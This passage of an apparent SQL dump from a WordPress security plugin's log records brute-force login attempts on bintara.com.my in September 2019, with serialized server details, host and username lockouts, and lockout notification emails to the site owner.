(X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY7hXkXpgmG5P@iB8lE6wAAAJQ\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.184.25\";s:11:\"REMOTE_PORT\";s:5:\"60834\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY7hXkXpgmG5P@iB8lE6wAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078149.3208\";s:12:\"REQUEST_TIME\";s:10:\"1569078149\";}}','notice','2019-09-21 15:02:30','2019-09-21 15:02:29',19193912,20682520,'https://bintara.com.my/wordpress/wp-login.php',1,0,'159.89.184.25'),(26472,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:02:29\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:02:29\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:02:29\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:02:29\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:02:30','2019-09-21 15:02:29',19278656,20682520,'https://bintara.com.my/wordpress/wp-login.php',1,0,'159.89.184.25'),(26473,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:02:30','2019-09-21 15:02:29',19486288,20682520,'https://bintara.com.my/wordpress/wp-login.php',1,0,'159.89.184.25'),(26474,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY7oXkXpgmG5P@iB8lE-AAAAJA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"185.80.92.123\";s:11:\"REMOTE_PORT\";s:5:\"44364\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY7oXkXpgmG5P@iB8lE-AAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078177.5985\";s:12:\"REQUEST_TIME\";s:10:\"1569078177\";}}','notice','2019-09-21 15:02:59','2019-09-21 15:02:58',19195584,20684784,'https://bintara.com.my/wp/wp-login.php',1,0,'185.80.92.123'),(26475,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:02:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:02:58\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:02:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:02:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:02:59','2019-09-21 15:02:58',19280576,20684784,'https://bintara.com.my/wp/wp-login.php',1,0,'185.80.92.123'),(26476,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:02:59','2019-09-21 15:02:58',19487928,20684784,'https://bintara.com.my/wp/wp-login.php',1,0,'185.80.92.123'),(26477,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY7sXkXpgmG5P@iB8lFBQAAAJg\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.180.123\";s:11:\"REMOTE_PORT\";s:5:\"42819\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY7sXkXpgmG5P@iB8lFBQAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078193.2792\";s:12:\"REQUEST_TIME\";s:10:\"1569078193\";}}','notice','2019-09-21 15:03:14','2019-09-21 15:03:13',19195240,20685200,'https://bintara.com.my/wordpress/wp-login.php',1,0,'128.199.180.123'),(26478,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:03:13\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:03:13\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:03:13\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:03:13\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:03:14','2019-09-21 15:03:13',19280488,20685200,'https://bintara.com.my/wordpress/wp-login.php',1,0,'128.199.180.123'),(26479,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:03:14','2019-09-21 15:03:13',19487976,20685200,'https://bintara.com.my/wordpress/wp-login.php',1,0,'128.199.180.123'),(26480,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY7xnkXpgmG5P@iB8lFEQAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.11.43\";s:11:\"REMOTE_PORT\";s:5:\"41166\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY7xnkXpgmG5P@iB8lFEQAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078214.1768\";s:12:\"REQUEST_TIME\";s:10:\"1569078214\";}}','notice','2019-09-21 15:03:35','2019-09-21 15:03:34',19194208,20682464,'https://bintara.com.my/test/wp-login.php',1,0,'159.203.11.43'),(26481,0,'lockout','host-lockout::159.203.11.43','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"159.203.11.43\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:03:34\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:03:34\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:03:34\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:03:34\";s:12:\"lockout_host\";s:13:\"159.203.11.43\";}','action','2019-09-21 15:03:35','2019-09-21 15:03:34',19279992,20682464,'https://bintara.com.my/test/wp-login.php',1,0,'159.203.11.43'),(26482,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"159.203.11.43\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:03:34\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:03:34\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:03:34\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:03:34\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:03:35','2019-09-21 15:03:34',19279960,20682464,'https://bintara.com.my/test/wp-login.php',1,0,'159.203.11.43'),(26483,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:03:35','2019-09-21 15:03:34',19488632,20682464,'https://bintara.com.my/test/wp-login.php',1,0,'159.203.11.43'),(26484,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY7ynkXpgmG5P@iB8lFFQAAAJA\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.135.99\";s:11:\"REMOTE_PORT\";s:5:\"56529\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY7ynkXpgmG5P@iB8lFFQAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569078218.741\";s:12:\"REQUEST_TIME\";s:10:\"1569078218\";}}','notice','2019-09-21 15:03:40','2019-09-21 15:03:39',19194208,20682464,'https://bintara.com.my/2019/wp-login.php',1,0,'103.15.135.99'),(26485,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:03:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:03:39\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:03:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:03:39\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:03:40','2019-09-21 15:03:39',19279048,20682464,'https://bintara.com.my/2019/wp-login.php',1,0,'103.15.135.99'),(26486,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:03:40','2019-09-21 15:03:39',19487088,20682464,'https://bintara.com.my/2019/wp-login.php',1,0,'103.15.135.99'),(26487,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY74XkXpgmG5P@iB8lFKQAAAIY\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"81.0.120.26\";s:11:\"REMOTE_PORT\";s:5:\"55860\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY74XkXpgmG5P@iB8lFKQAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078241.9488\";s:12:\"REQUEST_TIME\";s:10:\"1569078241\";}}','notice','2019-09-21 15:04:03','2019-09-21 15:04:02',19191040,20680016,'https://bintara.com.my/blog/wp-login.php',1,0,'81.0.120.26'),(26488,0,'lockout','host-lockout::81.0.120.26','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:11:\"81.0.120.26\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login 